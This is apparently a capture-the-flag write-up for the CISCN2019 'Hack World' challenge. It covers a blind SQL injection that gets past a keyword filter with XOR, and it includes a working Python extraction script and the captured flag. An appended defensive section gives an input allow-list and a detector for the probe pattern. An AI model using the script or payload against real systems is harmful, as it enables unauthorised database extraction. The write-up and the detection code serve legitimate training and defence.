[CISCN2019 North China Division Day2 Web1] Hack World 1

Posted by TazmiDev on 2024-11-10

Opening the instance reveals a POST injection form.

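My blind guess was SQL injection. The universal-password check turned up nothing, and testing showed that a large number of SQL keywords are filtered.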

Trying () produced bool(false), which confirms that this is a boolean-based blind injection challenge.

and is disabled, so I decided to use XOR (^) injection.

Build a payload script and go all in:

Successfully obtained the flag:

flag{a2f7089d-bd8c-4659-bcd6-9c3b3e4780dc}

Script attached:

import requests
import time

def jiaoben(url, field_length=50, request_interval=0.01):
    result = ''
    for i in range(1, field_length + 1):
        # Binary search over the ASCII range for the character at position i
        max_val = 127
        min_val = 0
        while (max_val - min_val) > 1:
            mid_val = (max_val + min_val) // 2
            payload = f'1^(ascii(substr((select(flag)from(flag)),{i},1))>{mid_val})=1'
            response = requests.post(url, data={'id': payload})
            # 'Hello' in the response means the character code is <= mid_val
            if 'Hello' in response.text:
                max_val = mid_val
            else:
                min_val = mid_val
            time.sleep(request_interval)
        result += chr(max_val)
        print(result)  # Print the current guess in real time
    print(f"Final result: {result}")
    return result

url = ''
jiaoben(url)
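
A defender's view of the traffic this script generates, as an added example that is not part of the original post: an allow-list check for the id parameter (which a keyword blacklist cannot replace) and a detector for the binary-search probe pattern. The function names, thresholds, and sample events are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Matches the extraction shape used by the script above:
# ascii(substr(<subquery>,<position>,1))><threshold>
PROBE = re.compile(
    r"ascii\s*\(\s*substr\s*\(.*,\s*(\d+)\s*,\s*1\s*\)\s*\)\s*>\s*(\d+)",
    re.I | re.S,
)

def is_valid_id(value: str) -> bool:
    """Allow-list check: the id parameter must be a short run of digits only."""
    return re.fullmatch(r"[0-9]{1,9}", value) is not None

def find_blind_extraction(events, min_probes=5, min_positions=2):
    """events: iterable of (client, id_value) pairs.
    Returns {client: sorted positions probed} for clients whose requests
    look like a binary search over character codes."""
    seen = defaultdict(lambda: defaultdict(set))  # client -> position -> thresholds
    for client, value in events:
        m = PROBE.search(value)
        if m:
            seen[client][int(m.group(1))].add(int(m.group(2)))
    flagged = {}
    for client, positions in seen.items():
        probes = sum(len(t) for t in positions.values())
        if probes >= min_probes and len(positions) >= min_positions:
            flagged[client] = sorted(positions)
    return flagged

# Constructed sample events: (client address, submitted id value).
SAMPLE = [("198.51.100.7", "1"), ("198.51.100.7", "2")]
for pos in (1, 2):
    for mid in (63, 95, 111, 103, 99, 101, 102):
        SAMPLE.append(
            ("203.0.113.9",
             f"1^(ascii(substr((select(flag)from(flag)),{pos},1))>{mid})=1")
        )

if __name__ == "__main__":
    print(find_blind_extraction(SAMPLE))
    print(sum(1 for _, v in SAMPLE if not is_valid_id(v)), "values rejected by the allow-list")
```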
